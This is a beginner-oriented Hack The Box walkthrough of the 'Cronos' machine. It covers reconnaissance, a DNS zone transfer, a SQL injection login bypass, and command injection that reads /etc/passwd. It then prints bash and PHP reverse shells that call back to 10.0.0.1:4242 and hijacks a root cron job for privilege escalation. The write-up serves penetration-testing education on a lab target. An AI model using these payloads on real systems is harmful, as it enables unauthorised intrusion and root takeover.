CRONOS {HACK THE BOX} WALK THROUGH
Hey, So in this article I have written a walk through to complete the ‘Cronos’ Machine in ‘Hack The Box’, I selected this machine mainly for the beginners to understand the basic methodology in penetration testing. Hope you’ll enjoy it.
SCANNING AND RECONNAISSANCE
TARGET — -> http://10.10.10.13/
NMAP SCAN RESULTS
First lets start by doing a network scan to find out what ports and services are available in this server. In the following command ‘-sC’ is for Default scripts ‘-A’ is for Aggressive scanning ‘-T4’ for Speed of the scan.
root@snowdox:/home/snowdox# nmap -sC -A -T4 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2021–02–24 21:28 EST
Nmap scan report for 10.10.10.13
Host is up (0.22s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10–4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16–4.6 (92%), Linux 3.2–4.9 (92%), Linux 3.8–3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 197.23 ms 10.10.14.1
2 198.61 ms 10.10.10.13OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.40 seconds
Here you can see the port 80 and 53 are open :) perfect 2 ports to start enumerating those service
EDITED THE HOST FILE
So in this step I’ll be adding the domain ‘cronos.htb’ to the /etc/hosts file so that it’ll resolve the IP and redirects to the proper webpage
Eg-: nano /etc/hosts and then insert the IP and domain as below and CTRL+O to save the file
{CHECK THE WEBSITE ENUMERATION SECTION FOR THE RESULTS}
NIKTO SCAN RESULTS
Just because I am Curious I thought of running nikto too, in case I would find a potential vulnerability in the system or any other interesting directories.
Eg-: nikto -h {ip address}
As you can see after running the scan we can confirm that the web server is indeed an ‘Apache/2.4.18’ as we saw in the nmap scan. Now lets move forward to enumerate the web server which is port 80
WEBSITE ENUMERATION
FRONT PAGE
The frontend of the website is a default apache website and as a good habit its better to check the source code in every website you visit in case there can be hardcoded credentials or directories in it.
ENUMRATING DIRECTORIES
I TRIED ENUMERATING USING GOBUSTER AND DIR SEARCH BUT NO LUCK
Eg-: gobuster dir -u http://{ip} -w {wordlist path}
NEW PAGE AFTER EDITING THE HOST FILE {check scanning and reconnaisance for the DNS enumeration}
This is after entering the domain ‘cronos.htb’ in the /etc/hosts file. Now we have a new website but still I couldn’t bruteforce the directories cause something was blocking me. So I decided to do a DNS zone transfer using the tool ‘dig’.
GOT SOME DOMAINS AFTER DOING SOME DNS ENUMERATION WITH ( ZONE TRANSFERS)
Eg-: dig axfr @{ip} cronos.htb (axfr — -> To perform a Zone transfer)
**AFTER THAT I REDIRECTED MY /ETC/HOSTS FILE BY ADDING THE GATHERED DOMAIN NAMES**
AFTER CLICKING ALL THE LINKS IN THE WEBSITE I FOUND OUT THAT ITS CMS IS LARAVEL :) SPECIALLY BY VISTING THE GITHUB PAGE.
TRIED TO GET A EXPLOIT USING SEARCHSPLOIT
BUT IT WASN’T NECESSARY SINCE WE HAD COMMAND INJECTION AND SQL INJECTION VULNERABILITIES…..I THINK WE CAN DO IT USING THE METASPLOIT FRAMEWORK’S(RUBY SCRIPT) REMOTE CODE EXECUTION EXPLOIT TOO……
SQL INJECTION
So after getting access to the ‘admin.cronos.htb’ domain I came across a login page I thought I had to some bruteforcing but didn’t have any hints so I thought of changing the plan, I intercepted the login request using burpsuite and Sent the request to the intruder tab and added the username and password as my payload parameters and I thought of checking if there are any SQL injection Vulnerability so I got a list of SQL injection payloads and started the attack.
TRYING TO INJECT THE LOGIN FORM USING SQL INJECTION USING BURPSUITE, WE CAN GET THE CHEAT SHEET OF SQL INJECTION FOR AUTHENTICATION BYPASS FROM — -
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
RESULTS OF THE SCAN
{WE FOUND A 302 RESPONSE WHICH IS ODD OUT OF ALL 200 RESPONSES….LET’S CHECK THE QUERY IN THE LOGIN PAGE
SQL INJECTION PAYLOAD — -> (admin’ or ‘1’=’1)
AND AFTER LOGIN IN WE GET TO SOME SOUGHT OF A NETWORK TESTING INPUT FIELD WHICH WE CAN PING AND TRACEROUTE AN IP ADDRESS
THIS IS HOW IT LOOKS LIKE AFTER INTERCEPTING THE PING COMMAND VIA BURPSUITE
IF WE EDIT THE COMMAND AND SEND THIS — ->
command=cat&host=/etc/passwd SURPRISE U CAN ACCESS THE PASSWORD FILE….COMMAND INJECTION ACTIVATED :)
NOW WE HAVE TO GET A REVERSE SHELL ABUSING COMMAND INJECTION VULNERABILITY…. U CAN FIND A LIST OF REVERSE SHELLZZ FROM HERE — ->
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
AFTER USING THIS BASH SHELL ‘bash -i >& /dev/tcp/10.0.0.1/4242 0>&1’ THE FULL COMMAND IS bash -c ‘bash -i >& /dev/tcp/10.0.0.1/4242 0>&1’ (change ur ip and port) better if you do URL encoding incase it doesn’t bypass the web filters. To do that highlight the command in the Burpsuite and press ‘CTRL+U’
SINCE WE HAVE A REVERSE SHELL NOW LETS MOVE INTO PRIVILEDGE ESCALATION……
PRIVILEDGE ESCALATION
THE BASIC ENUMERATION IN A LINUX MACHINE
1) www-data@cronos:/home$ export TERM=xterm
2) www-data@cronos:/home$ whoami (shows the authenticated users name)
3) www-data@cronos:/home$ id (it will show you user identification number)
4) www-data@cronos:/home$ find / -perm -u=s -type f 2>/dev/null (u can use it to find SUID enabled files in the system)IF U CHANGE YOUR DIRECTORY TO /HOME/{USER}/ — — -U CAN FIND THE USER.TXT (FLAG)
AUTOMATED PRIVILEDGE ESCALATION USING “LINENUM.SH” SCRIPT DOWNLOAD IT FROM HERE
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
CHANGE UR DIRECTORY TO “ /dev/shm” AND GOTO THE DIRECTORY WHERE UR LINENUM.SH FILE IS LOCATED AND START A PYTHON SERVER
‘ python3 -m http.server’ AND IN THE REVERSE SHELL TYPE
‘wget http://{userip):8000/linenum.sh' in the terminal…..
This above picture is the reverse shell :’)
Change the mode by typing ‘chmod +x linenum.sh’ and start the program by typing ‘./linenumsh’
CRONJOB
It’s Better if u scroll up and down to see any suspicious actions in the system.
From the above picture we can see that there is odd service running as a ‘cronjob’ called artisan which runs every minute…lets try to exploit it to gain root access
Change your directory to the location where the file is located and type ‘ls -al’ to see more details about the file permissions.
As we can see it allows us to read an write the file :)
To exploit it we have to edit the script to get a root shell such as embedding a reverse shell to another port in our machine
So I removed the artisan original file and created a new artisan file using a a php reverse shell →
<?php
$sock=fsockopen(“10.0.0.1”,4242); (change IP to your tun0 IP[VPN])
exec(“/bin/sh -i <&3 >&3 2>&3”);
?>
AFTER THAT I STARTED A PYTHON SERVER AND SENT THE ARTISAN FILE TO THE REVERSE SHELL….WAITED FOR 1 MINUTE WHILE LISTENING ON THE PROVIDED PORT(any port number)…..SOON AFTER THE EXECUTION WE GOT A ROOT SHELL :)
So I hope you’ll at least got the methodology to test a system for any potential vulnerabilities, Remember!! this is just a basic walkthrough. :) and you’ll face more challenging systems and more time consuming machines….Enumeration is the key.
“ALWAYS TRY HARDER”
THANK YOU FOR READING
AUTHOR: NATHANEAL (AKA SNOWDOX)
